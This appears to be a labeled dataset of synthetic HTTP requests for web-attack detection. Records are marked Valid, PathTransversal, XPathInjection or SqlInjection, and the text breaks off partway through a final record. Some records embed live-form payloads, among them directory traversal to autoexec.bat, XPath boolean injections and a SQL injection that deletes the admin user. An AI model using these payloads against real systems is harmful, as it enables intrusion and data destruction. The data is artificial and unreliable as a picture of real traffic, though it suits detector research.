GET /AKHNm7sVS7/ainko2m.sh?ne5=r5u+&3OasetdbdRio3d=dn7mSwV&hjoyhjeabedwdi=z4bDA0&.6I1bJI=fqse%3Cp&seseomsser=d&idFyrefd1s=6979442475&esli=77276&merYntsrl=75723170&dro4iah=2xuanI9m0ausa&thnd=044 HTTP/1.0
Host: www.dhlcjxartg.net:84
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-hebrew, x-mac-hebrew;q=0.9, iso-10646-ucs-2, iso-8859-8-i, iso-8859-8
Accept-Encoding: 
Accept-Language: o3uiP4-t, l-5w;q=0.0
Cache-Control: min-fresh=96394
Client-ip: 39.244.159.119
Cookie: rhue6ehh9dhwtoa=1?mail;iteamqcume= p;lI1PZAm0NDS=aenphpi
Cookie2: $Version="768"
Date: Wed, 15 Jul 09 19:12:05 UTC
ETag: W/"sSeJGMsGdG-8O4G"
Expect: 100-continue
From: aaS7di@esk6nosXr.cz
If-Modified-Since: Wed, 11 Oct 06 24:19:28 GMT
If-Unmodified-Since: Mon, 28 Dec 09 12:55:12 UTC
If-Match: "9zyKOoQi16o6G@XSZ_Gr"
If-None-Match: "ROtvZ66vgdU2ykz"
If-Range: Fri, 18 Nov 05 18:14:01 CET
Max-Forwards: 1308
MIME-Version: 0.4
Pragma: 7twsIb=Dp6n
Proxy-Authorization: Basic MmZ0bGxjOnBpaXNv
Authorization: NTLM ZW95ZERmbWh1Y01wZnI2YXVucjdubmFFeW9lZGYxb2Nhc255U25qc2t5c21s
Range: 05745-,56-61
Referer: http://www.aymo.org/enmbSls/syso4Q/hljasla/fiv4ha/mnaeo3.exe
TE: trailers,gzip;q=0.0,gzip;q=0.0
Trailer: Host
User-Agent: mhahtyailiraet6
UA-CPU: PowerPC
UA-Disp: 011,976,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 033x3612
Via: 0.1 13.100.108.77, 5.9 www.airan.gif, FTP/1.1 151.96.205.88
Transfer-Encoding: identity
Upgrade: anxrdn/9.4, nRovoy/2.5, p6aym/9.5, 6rc/8.0, nAhe/8.8
Warning: 632 www.rTe2l.html "hcd9dnnAbmuvu5it" "Sun, 10 Sep 06 21:36:43 GMT"
X-Forwarded-For: 152.171.77.200
X-Serial-Number: 969767
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30348
Start - Id: 45725
class: PathTransversal
GET /7HoPiYqHToIXC88z9kuQ.php3?a@q-4o=om%3C&sreOiennttOe=iocLituaaee&hFBzi_OqL6I=updatesn&l2mnErodbhs=..%2F..%2F..%2FWINNT%2Fautoexec.bat&eihnr=9ek&15OetndeEx=845207&ph3tissx=obu5eida1 HTTP/1.0
Host: 75.185.65.144:00
Connection: nrrmneOs
Accept: */*
Accept-Charset: shift_jis;q=0.7, iso-2022-jp;q=0.8, iso-8859-7;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 19.222.68.7
Cookie: avcavr3=mOhdjca9vr18td;oNokw8sLI=7=g hdtr%adrut;detK5=lpe
Cookie2: $Version="66"
Date: Wed, 25 Jul 07 20:27:22 CET
ETag: W/"1Y3U.lwjxB9J7umjL"
Expect: 9tbmn
From: reani1tb@daeireeubl.de
If-Modified-Since: Mon, 19 Sep 05 06:49:47 CET
If-Unmodified-Since: Fri, 08 Sep 06 24:58:48 UTC
If-Match: "iS9hNg33yZg2EVvqN"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 2.1
Pragma: no=rcrt
Proxy-Authorization: Digest realm
Authorization: Digest opaque="pTar"
Range: -500252,934-3694
Referer: /efrehn3/itie.avi
TE: chunked;q=0.2,trailers,trailers
Trailer: Cache-Control
User-Agent: dNwefrs4ib/3.7.7.5.5
UA-CPU: Sparc
UA-Disp: 664,891,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 534x391
Via: FTP/5.1 www.IEbcnloh.tiff, 3.7 www.s6di.jpeg, 8.6 33.206.197.118
Transfer-Encoding: 827xm; sopoib=qns759
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 139 123.133.191.85 "aoRovfiyaetlwhiotHa" "Tue, 27 Apr 10 21:16:33 GMT"
X-Forwarded-For: 159.195.9.102
X-Serial-Number: 1618317
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45725
Start - Id: 49064
class: XPathInjection
GET /6hcltnenr/4jRUfCXconnectySSuEr.css?rapsE=16ndati%27+++++or++1%3C+++frntn%2Fccfty%2Fe%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D559%5D+++or+++%27ga%27+++%3D%27&ntmoaoalfape=433126 HTTP/1.0
Host: www.wgaaeri.net
Connection: n66Aeed
Accept: */*
Accept-Charset: windows-1252, macintosh, cp-950, utf-7;q=0.6
Accept-Encoding: deflate;q=0.1, compress;q=0.5, compress, gzip;q=0.7, deflate;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 164.173.183.167
Cookie: 6ynto3d4=W l-eN;g8NaG_fFWand0@=nrudnoon;dYPKU=%e'%=roteia t gqniwp-;awnno=258584
Cookie2: $Version="84"
Date: Mon, 26 Apr 10 19:25:39 UTC
ETag: W/"bj@Q8.9F_UsS-HtPu"
Expect: I3umu=lic0is
From: oT4sie@pMej.gov
If-Modified-Since: Sat, 10 Apr 04 06:18:55 CET
If-Unmodified-Since: Sun, 04 Apr 10 15:25:35 UTC
If-Match: "qk.OLolgoCa@E-cV"
If-None-Match: "L2FAcLjUbmCiC-vxR"
If-Range: "8WcuBMDm2pIipGgVD"
Max-Forwards: 1610
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM Y3FhZWFobWFmYW5BaGRlZHRlb3Jhc2xhZTluR2xEdmxkVWNuaEl0ZW92cw==
Authorization: Basic OWhpZDphd3RocGVhNQ==
Range: -4,-1070,-459610
Referer: /hmeio.bin
TE: trailers,trailers,gzip
Trailer: Date
User-Agent: Mozilla/0.0 (X11; U; Unix 0.2; rn-nu; rv:5.9.1) Gecko/12671990
UA-CPU: x86
UA-Disp: 470,303,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7313x7197
Via: 3.6 www.hc9Ts0s.png, tE8y/3.7 140.173.241.5, 6.5 www.napE.jpg
Transfer-Encoding: qahhra
Upgrade: ne0d/6.8, b5on/7.9, gcX8/0.6, bci/5.8, ibw/8.8
Warning: 069 www.eoApA.tiff "paahksminehn7lr6TE" "Wed, 28 Oct 09 15:16:56 CET"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 509527
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49064
Start - Id: 49995
class: XPathInjection
PUT /oW/e4Dogz/o.rMHP61Zr2/rI0OMvrSUb/TqS.nj3GUD/34DlOUPn.f-y/hfeaiesZoudies2/asU/8e9zenyosieb9eiweu/so12t.dll? HTTP/1.1
Content-Length: 201
Content-Language: 7isir0O,Re2,nsnce
Content-Encoding: deflate
Content-Location: http://www.wEaei.cz/8wmhem/lilpee/wsee97ie/u5Luk.jsp
Content-MD5: OHM2dGRjT2l0MmZrb2lVdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Jul 06 05:23:58 UTC
Last-Modified: Tue, 19 Dec 06 10:36:09 GMT
Host: www.vdYrpcP.ch:36
Connection: uehltn3
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: t/vcu/r/child::node()[   position()=89] |  dp/papds/c/child::text()[position()=624]     or    'drvInfo'    =   '
Cache-Control: no-store
Client-ip: 89.188.193.205
Cookie: ysrtt=eHpVXbFXm;5uovi8Sul1mChci=4;WNf9Oq7b3-C6=7
Cookie2: $Version="85"
Date: Sun, 07 May 06 01:00:30 CET
ETag: "B@Z_FoQ6sHQt.m-"
Expect: 100-continue
From: etjd@onalE.be
If-Modified-Since: Sun, 14 Dec 08 12:30:49 GMT
If-Unmodified-Since: Sun, 01 Jul 07 13:18:09 GMT
If-Match: "yyz2SBTKCVsnF8MKL@"
If-None-Match: *
If-Range: Mon, 23 May 05 21:58:39 GMT
Max-Forwards: 400
MIME-Version: 2.4
Pragma: ae=ape
Range: -850,-93,-844
Referer: http://www.ex2tij.ch/Nuei.msf
TE: deflate;q=0.6
User-Agent: Mozilla/6.5 (Windows; U; Win98 9.7; o5-wn; rv:7.0.3) Gecko/26692913
UA-CPU: x86
UA-Pixels: 957x1532
Via: FTP/9.8 191.115.53.215, 4.9 www.tsHe.js:706
Transfer-Encoding: compress
X-Serial-Number: 7920080126086879316
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

mdoscm=c'4taete&ofiqepbarer22Hx=4875&6c=6376&C0gihi=soorUebujlr&tc=l6OG&GhRtCd=%&6eGtiint8e=PxuiorinHt&qehsease=uu&sttNy=2Vuets55Al&nij=89504&eyttunoer=jorjaenn&pxtyy=welynclsnddncs&netillBito=t9E0

End - Id: 49995
Start - Id: 42522
class: SqlInjection
GET /6pT47sf/ei8xLzL74x1qq_uipd/a9iauten91/lM/eein0r6rngt9TduasnY3/xgHg0TPmetaV/succiSMaUkf.bnTrBe3/nvzI2ixAIbQ/aFQ8_jZv.tiff?eho2nmiHsezro=8usiX%27+++%29%3BDELETEFROMusersWHEREupper%28username%29+%3D++++upper%28%27admin HTTP/1.1
Host: www.ahpieaet.uk:8
Connection: noobrTc
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 126.1.229.33
Cookie: nhtstaiEtrsalai=sWDx;rylepeena0wt=2034;Ghortbs=e2R
Cookie2: $Version="1"
Date: Fri, 16 Jul 04 06:56:50 CET
ETag: W/"bdccCy6uK1YsnZ3Ajlk0"
Expect: 100-continue
From: lwelhoow@zyxm39yja.net
If-Modified-Since: Sat, 06 Jun 09 02:07:16 UTC
If-Unmodified-Since: Sat, 19 Aug 06 03:05:22 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 18 Jul 09 11:50:46 GMT
Max-Forwards: 5171
MIME-Version: 6.0
Pragma: 5b=lEen
Proxy-Authorization: NTLM NXRXZGh0ZW81bXNzbm1nYXhudm1UZGR0aWFhZmVmcGV0c2FuZWVLZXJlcnM=
Authorization: Basic Y1h3aDppZHBiemhSOQ==
Range: 430-,2-8084
Referer: /e90a/elOwoal/tlor/rvesft3.asmx
TE: deflate,trailers,deflate;q=0.5
Trailer: Via
User-Agent: Mozilla/0.8 (compatible; MSIE 5.2; Windows NT; nenw; epi7trtae)
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 0.4 31.250.126.26
Transfer-Encoding: identity
Upgrade: est/3.4, YhOty/4.0, cy16/8.0, cdtno/6.6
Warning: 039 www.rscr.js "tEodeseiset5e5eLbAid" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 49861
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42522
Start - Id: 35707
class: XPathInjection
GET /zsafIteannse.mdb?tetIxyrzgc=9rsAw%27++++or++++%28i++++%3C++count%28k9%2Fchild%3A%3Atext%28%29%29+and+++++j+%3C++++count%28rh1kog%2Fchild%3A%3Acomment%28%29%29++++and+k+%3C++++count%28Sstot%2Fchild%3A%3A*%29++++%29++++or+%27sn%27++++%3D+%27+u3oa%27+++or HTTP/1.0
Host: 74.141.66.190
Connection: vpsntebu
Accept: */*;q=0.6
Accept-Charset: iso-8859-7;q=0.1, iso-10646-ucs-2, iso-8859-8;q=0.6
Accept-Encoding: identity
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 144.129.84.108
Cookie: l5updateMkL2oWk=oformg6U\;2Ncplov=7780890;kaMu=6q06lvF;es5eHehmirza6ce=49748812;rtnAnwi=686833
Cookie2: $Version="35"
Date: Thu, 15 Oct 09 15:22:19 CET
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: 100-continue
From: 0iiTea@WooaceteB.de
If-Modified-Since: Sat, 19 Feb 05 10:10:57 GMT
If-Unmodified-Since: Sun, 30 Jul 06 03:27:01 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Aug 05 06:13:09 UTC
Max-Forwards: 2
MIME-Version: 3.9
Pragma: 6tlirn=dI99Re
Proxy-Authorization: Digest cnonce="N2rrnfo"
Authorization: Basic Y2RsYTp0b3RsbzM=
Range: 5225-,8-9,1-
Referer: /luayn6a/Ghk5lt/N3tenri/h4senta/eihhaInh.fgf
TE: trailers,gzip;q=0.6
Trailer: User-Agent
User-Agent: Mozilla/0.4 (Windows; U; Win98 3.0; dc-vi; rv:4.8.7) Gecko/35564051
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 656x763
Via: 9.6 46.148.145.11, HTTP/5.9 15.10.75.140:8791
Transfer-Encoding: gzip
Upgrade: acPhne/6.3, xettw/7.0
Warning: 077 www.sbrSm.jpeg "j0ohalrir1I" "Tue, 05 Dec 06 01:13:07 GMT"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35707
Start - Id: 49893
class: XPathInjection
GET /hGRg8mcCN4nYXX-nD.jpg?zVvQBz2l=8&ojbhsigtteL6Xo=tn+&AeneT8tkicnt=ao%27+++++or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28i+%2B++++j%2B+k+%2B+++l++++%2B+++1%29%5D++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+++%27ei5t%27++++%3D%27++t3eO87so%27++++or&mlhhbeenv=TsrTlao4omnee%3Cexecainsert%5Bhr&HQbvX@Y=16&aito4tdt=h&net=td1hnrlocation&tdtN=rnei9vuyaO7xv HTTP/1.0
Host: 41.230.105.1
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.2
Cache-Control: max-age=79429
Client-ip: 30.98.150.84
Cookie: 2e=rigooklE;hpHcioe4t=jrcGo_;aexno3u2is=uns4bno;lp=6811;twsif=N
Cookie2: $Version="183"
Date: Tue, 18 Dec 07 23:43:58 UTC
ETag: W/"b-3HRHuMckDu@e-89"
Expect: 3ms1era
From: t9xyb@dtrmz.gov
If-Modified-Since: Wed, 04 Mar 09 04:33:06 CET
If-Unmodified-Since: Fri, 05 Aug 05 24:01:21 UTC
If-Match: "PdJHcuhFuvhPwd6"
If-None-Match: *
If-Range: "jbgmMGq_V9A_M6Wu.IBX"
Max-Forwards: 9600
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: oAo4 hnaarqm=nniOb
Authorization: Basic dTA3NjZPNnI6cm9ndW8=
Range: 794-
Referer: /kSdt/ho3owele/oearsMik.nsf
TE: trailers
Trailer: User-Agent
User-Agent: nyan1mp/6.7.0
UA-CPU: PowerPC
UA-Disp: 2831,824,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9591x1965
Via: 7.6 www.Adssrrw.js, 2.6 34.199.106.40
Transfer-Encoding: gzip
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 883 www.oeedEt.gif "90sw81n3tnalV" 
X-Forwarded-For: 88.207.99.219
X-Serial-Number: 87544886060
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49893
Start - Id: 8163
class: Valid
GET /2ecijreiwlh0t.htm?xh4ednu9eEO=166847598&ninoastsihRg=1PK-Ey&o3se0uwas=068&Hheraef=2168558&haollltnfryoB=u_3tY6D&er27ek=145&YfFoPWVI_metaj=98078667&idnHue=wiftor&nho=4+&Tuqf=ohstr-4linkbte&cIf=hiE99qN-.4tj&rtbhmhTi7Aau=b1m%404IENA_Zt&enetFi9xcde6lco=9598250 HTTP/1.1
Host: 249.199.23.221
Connection: close
Accept: image/jpeg;q=0.3
Accept-Charset: utf-7, euc-cn, us-ascii, euc-jp;q=0.5, iso-8859-8-i;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale=3207
Client-ip: 6.37.242.236
Cookie: wnR8HA6KtrG=494;htombitsefrone=3107269;TdIrtTOto=47;lska=s w;roditrhgmees=wCeeeriwindow.openANbs<t0s;easa=woM-0Gz0g
Cookie2: $Version="561"
Date: Sat, 20 Mar 10 12:22:59 GMT
ETag: "LcYYX-@nlr._HIP"
Expect: 100-continue
From: lncsrs1@ssri.net
If-Modified-Since: Fri, 10 Oct 08 22:13:39 GMT
If-Unmodified-Since: Sun, 01 Oct 06 12:29:16 GMT
If-Match: *
If-None-Match: "EbuiuqPvuC-GxU1z8-n"
If-Range: Sun, 13 Jan 08 17:19:25 CET
Max-Forwards: 120
MIME-Version: 4.7
Pragma: ixmhe='5l'
Proxy-Authorization: Digest nonce
Authorization: Basic ZzhzdGE6cnJ0MHRp
Range: -9,-33509
Referer: /tlem/pe8aaok8/neTyoe.css
TE: chunked,gzip
Trailer: Host
User-Agent: Mozilla/4.9 (compatible; um6llh; Unix; icMe; e8unEehl; steR)
UA-CPU: StrongARM
UA-Disp: 4611,8979,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 2774x909
Via: cTarun/1.5 www.ESu5Er.js, bhmlp1/5.4 77.46.195.47
Transfer-Encoding: identity
Upgrade: eqnale/1.9
Warning: 208 212.220.114.189 "i1gaNj" 
X-Forwarded-For: 110.129.233.176
X-Serial-Number: 720236680723695
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8163
Start - Id: 29569
class: Valid
GET /lvM9/e25avkory71dsT/jJQenZqhAarTD_fC/elH8CD5aNY@Oa/CRth26sncw.pl?dsWDAdh=w&uewegztoeeh0=tc0e&h2n=l5o1eid&ssdcoih5=NN&Iomorn5d=49 HTTP/1.0
Host: www.NtsgWoii.org:80
Connection: keep-alive
Accept: image/*;q=0.1, text/html, audio/x-wav;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: aMlg='70'
Client-ip: 187.64.65.72
Cookie: uaTaitsqtzq=3srm;uhdnoeEiro4ua=niilley;ileixALa0e=10049
Cookie2: $Version="7"
Date: Wed, 09 Mar 05 19:00:27 GMT
ETag: "CNsoJzy-6bRfbsyxA1"
Expect: 100-continue
From: ei0RuvN@uwelbdt.org
If-Modified-Since: Wed, 03 Nov 04 07:38:42 UTC
If-Unmodified-Since: Tue, 27 Jun 06 13:38:19 UTC
If-Match: "tRd6MXsxLNvXc-EuBz"
If-None-Match: *
If-Range: Sun, 09 Jan 05 02:35:29 GMT
Max-Forwards: 351
MIME-Version: 2.0
Pragma: nu=b6e
Proxy-Authorization: NTLM OEExbjJIdHVzcjlzNDhlbHVwbWpjd3A4OXRwRTlkaXI=
Authorization: Basic eW1lZW9oOTplYW5tYw==
Range: 825369-97,558284-7,646196-4450
Referer: http://tafenTi2.net/sss6daen.swf
TE: trailers,trailers,gzip
Trailer: Trailer
User-Agent: Mozilla/7.0 (Machintosh; U; PPC Mac OS X 7.7; le-ib; rv:8.8.8) Gecko/37466113
UA-CPU: 68000
UA-Disp: 5272,2339,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3909x9569
Via: 2.9 www.3l65ut.png
Transfer-Encoding: gzip
Upgrade: gih7ot/7.0, vjwg/9.7, tttnua/4.6
Warning: 880 250.169.70.244:31 "ob2rr7pb4tes" "Sun, 10 May 09 07:32:46 UTC"
X-Forwarded-For: 41.168.99.7
X-Serial-Number: 97266154050
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29569
Start - Id: 5115
class: Valid
POST /Ttleu8tntT/rei/noga/XQoCI.php4? HTTP/1.0
Content-Length: 216
Content-Language: g,ToRrO,Tfivr
Content-Encoding: compress
Content-Location: /hNqcl/rwSo.gif
Content-MD5: cmpoc3RhcGQybHZ0czllSQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Mar 07 24:50:06 CET
Last-Modified: Mon, 28 Sep 09 18:58:33 GMT
Host: 7.244.135.3:80
Connection: close
Accept: text/*
Accept-Charset: windows-1250, x-mac-hebrew, windows-1254
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 115.88.131.92
Cookie: hnwAroe5n=1drope;2innomlySt01=]|passwdp=;sebLrv=9;ad3iefar=ephp1eetcm6g
Cookie2: $Version="36"
Date: Mon, 04 May 09 06:49:57 GMT
ETag: W/"x8AEDAMYAkpVc6Zw@4"
Expect: qat6eoka=gehrn
From: h1ato@oncfne.gov
If-Modified-Since: Sun, 29 Nov 09 02:26:43 CET
If-Unmodified-Since: Wed, 13 Sep 06 05:29:49 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 23 Feb 07 16:21:05 UTC
Max-Forwards: 59
MIME-Version: 8.8
Pragma: ol=euy
Proxy-Authorization: kaatod qtRK=eaIhe
Authorization: Basic cGR3ZTphc3VsM2c=
Range: 0-,76-222917
Referer: http://frrsESn.fr/emuog/rhnre6/efifefod.sh
TE: deflate;q=0.2,trailers
Trailer: Transfer-Encoding
User-Agent: etiaceprbr (ek3.ZeATv; eH3r.sPU)
UA-CPU: MIPS
UA-Disp: 7521,8259,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8123x7960
Via: 8.4 97.9.80.153
Transfer-Encoding: gzip
Upgrade: 7cee/2.2, ualbe/7.8, jivnu/6.0
Warning: 045 www.glqe.js "r3y4amdOaIhbislattz" "Sun, 09 Apr 06 01:43:43 CET"
X-Forwarded-For: 248.188.122.40
X-Serial-Number: 21059
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aeshnI=sstht&e1eaGeijdyhisoj=1800062&insertaLOqxpassthruFSxp_R=wCassf&3eece005=Agefottdoasimrl&uixOrig=91571&5nosstesrtlml=l\l &uitR=aKWz@ins_zW&D6lcUMjcBIt=htpasstfuaa9instz&owehtpass=t&stjuAtoolet6=sxY1J@VGy.

End - Id: 5115
Start - Id: 29587
class: Valid
GET /ogoipetoou7fhsbnl/kwaccess_logF4L.pl?c3af3eies0yo=oboot.iniib&0LffVea=valnitaEbt&SFM14YSxp_R4=bodyrgu9&1alhi=eDibgsound%24Amtounionb&wlGo5ry=depluehmbsandce HTTP/1.1
Host: www.5yete.fr:4
Connection: ro3to7
Accept: image/jpeg, text/*, application/rtf;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 100.140.145.133
Cookie: uIatocbeia=s~%o
Cookie2: $Version="6"
Date: Sun, 03 Aug 08 13:17:22 CET
ETag: W/"R8IqnBOAH7IGFUVH"
Expect: 100-continue
From: d1em@0njeio.be
If-Modified-Since: Tue, 12 Feb 08 04:46:47 GMT
If-Unmodified-Since: Tue, 09 Feb 10 17:01:08 CET
If-Match: "_diIQnrfXAKX5R99enS"
If-None-Match: *
If-Range: Fri, 05 Nov 04 02:55:01 UTC
Max-Forwards: 8751
MIME-Version: 6.8
Pragma: a1Wrde=bgr
Proxy-Authorization: NTLM OEExbjJIdHVzcjlzNDhlbHVwbWpjd3A4OXRwRTlkaXI=
Authorization: NTLM aWJ5RW5ieWxsY2NudHZBdERzQXVwYzRubG9vZWRzd3k2
Range: -074,-900485
Referer: http://ee0poiOt.gov/soym.ace
TE: deflate,chunked
Trailer: Trailer
User-Agent: toei (aEHouE@cRZ)
UA-CPU: 68000
UA-Disp: 872,513,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 3909x9569
Via: 2.8 www.aheolc.tiff, FTP/7.4 www.mo07.htm, HTTP/2.2 109.187.126.176:0968
Transfer-Encoding: deflate
Upgrade: okle/3.6, Ort/3.8, hew/6.7
Warning: 552 www.eghciu.html "MEdi" "Thu, 09 Jun 05 12:22:53 GMT"
X-Forwarded-For: 41.83.226.161
X-Serial-Number: 755614
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29587
Start - Id: 1504
class: Valid
GET /3wsystembodyimgr.tiff?rceehtioe=p03P7UyiQ&NbZomocha=%3Br&RhijiK=zwm%3A-8likeo+locationTe+%2B0&llhie=Kg+jpassthruvhnp%3FconnectmSi&atnaiswtmt=z8so+ HTTP/1.0
Host: 31.251.247.141
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: u-phit, eiiwR8-duoT;q=0.6
Cache-Control: min-fresh=39623
Client-ip: 242.47.145.222
Cookie: uiht=H0s;tftsYsas5ole4t=7222849;ujdtesshr=eJh;hit=tZxxdm;hhpcw=6695966
Cookie2: $Version="3"
Date: Wed, 13 Aug 08 02:46:53 GMT
ETag: "2hpiJIqnZpGoazCQc8"
Expect: ysnoei=wEEa;me8t2m=hshs
From: 5zeI8@rhKaeemAo.st
If-Modified-Since: Tue, 17 Feb 04 23:48:02 CET
If-Unmodified-Since: Thu, 06 Nov 08 22:03:14 GMT
If-Match: "oECmng28zU0DFQ0"
If-None-Match: *
If-Range: Fri, 26 Jan 07 14:05:05 GMT
Max-Forwards: 108
MIME-Version: 7.1
Pragma: Mn2rg='sw94'
Proxy-Authorization: NTLM Z2VzVEh6dmlxdHRlYXN5bTY3bmNhRGphY2h0b253NnRmaHJ0VGFFMw==
Authorization: eIrl iD0eim=SnhJN8
Range: 460-9787,-3
Referer: http://bbaI.de/n9fe/aeizstYa/AOueo/tveaoli8/Maig.tar
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: nobau3hHm/2.9.6
UA-CPU: MIPS
UA-Disp: 679,166,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1994x755
Via: 4.1 www.eOiLgis.shtml, 3.8 213.1.207.244, 0.9 2.155.38.156:3964
Transfer-Encoding: compress
Upgrade: S6gk/9.9, Aoe/4.0
Warning: 564 www.ellu.jpeg:2 "Sei8d" "Thu, 27 Jul 06 21:37:43 UTC"
X-Forwarded-For: 234.233.233.38
X-Serial-Number: 894892
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1504
Start - Id: 27109
class: Valid
GET /.L/hhmzrxiihn2n9d/cdswuaassneforet/e_gA0cSwY/KC1J.sh?hszrenn=786&slfguhsr4e=2173465&nr9tnuoeeae=ope40o6m&sfu=esad&rl1eure=4u%25x&eeag=ie HTTP/1.1
Host: 36.245.101.97
Connection: AA7E2e
Accept: application/*;q=0.7, image/*;q=0.7
Accept-Charset: utf-8, utf-8;q=0.8, iso-10646-ucs-2;q=0.6
Accept-Encoding: gzip;q=0.6, gzip, identity;q=0.7, gzip
Accept-Language: *
Cache-Control: max-age=16230
Client-ip: 33.122.90.124
Cookie: kraEHtEld=D2e;ihtspWi=24r/3g%hsoetnet;hRjt-=eUoHtFvdv;njedlpjeTi=83428461;enimctEn0K0itga=ercs;hn=iaqir4hoEtmpjhtpassr
Cookie2: $Version="8"
Date: Thu, 25 May 06 16:29:08 GMT
ETag: "Zraz.1dsGJK0I4nHIhp"
Expect: Tehnia=qnst;mnqgm8et=ltjerdss
From: hhafeiO@hshvl.net
If-Modified-Since: Wed, 07 May 08 16:59:50 GMT
If-Unmodified-Since: Sun, 11 Jul 04 13:21:27 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 24 May 07 20:18:37 UTC
Max-Forwards: 7
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest nc=51c1DF89
Authorization: FncaW eanEEiss=eceQ5r9
Range: -597,1-,-978584
Referer: http://www.iThahe.ch/hyEd/otoTotxs.dll
TE: chunked;q=0.2
Trailer: Pragma
User-Agent: Mozilla/1.6 (compatible; Konqueror/2.8; SunOS sun4u; comhost; dSes; ihIy6uT1Te)
UA-CPU: Sparc
UA-Disp: 724,7981,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 419x0757
Via: FTP/0.4 80.135.153.187, 6.3 132.82.74.162
Transfer-Encoding: gzip
Upgrade: tTow9n/5.9
Warning: 361 33.94.112.30 "aaityoctToiledbg" "Sun, 07 Sep 08 12:23:37 GMT"
X-Forwarded-For: 229.229.25.15
X-Serial-Number: 7609698
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27109
Start - Id: 34826
class: Valid
PUT /eTRlocationiZzUEqPstdin/qEBg@3uhUQrtEIe/tgjvHGVPK3/04qex/gXvzXv-./jLhY1/x9reeiyoo/FqZ-select3stdinQKcQkOZ/r38cAsyo6/9fkDmQftpnbmiXjCn/I2vM.gJm.php? HTTP/1.0
Content-Length: 100
Content-Language: ntg,ah8oT,xont
Content-Encoding: identity
Content-Location: /h6qtecpa.asmx
Content-MD5: eGh0b2tsNWU4YzhpZGVlaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 23 Jun 07 21:27:03 GMT
Last-Modified: Wed, 28 Oct 09 05:07:54 GMT
Host: www.oggeE.cz:15989
Connection: close
Accept: */*
Accept-Charset: iso-8859-1;q=0.1, iso-8859-3, iso-10646-ucs-2;q=0.5, x-mac-ce
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 182.32.15.30
Cookie: hutt2rneewjt=43538;p0mmfgfaoau=0;aru9nobOzrygk=hL3;ejabu=@p /havingrei(suhpilE;9VeWN31WetcmX=hrcsi
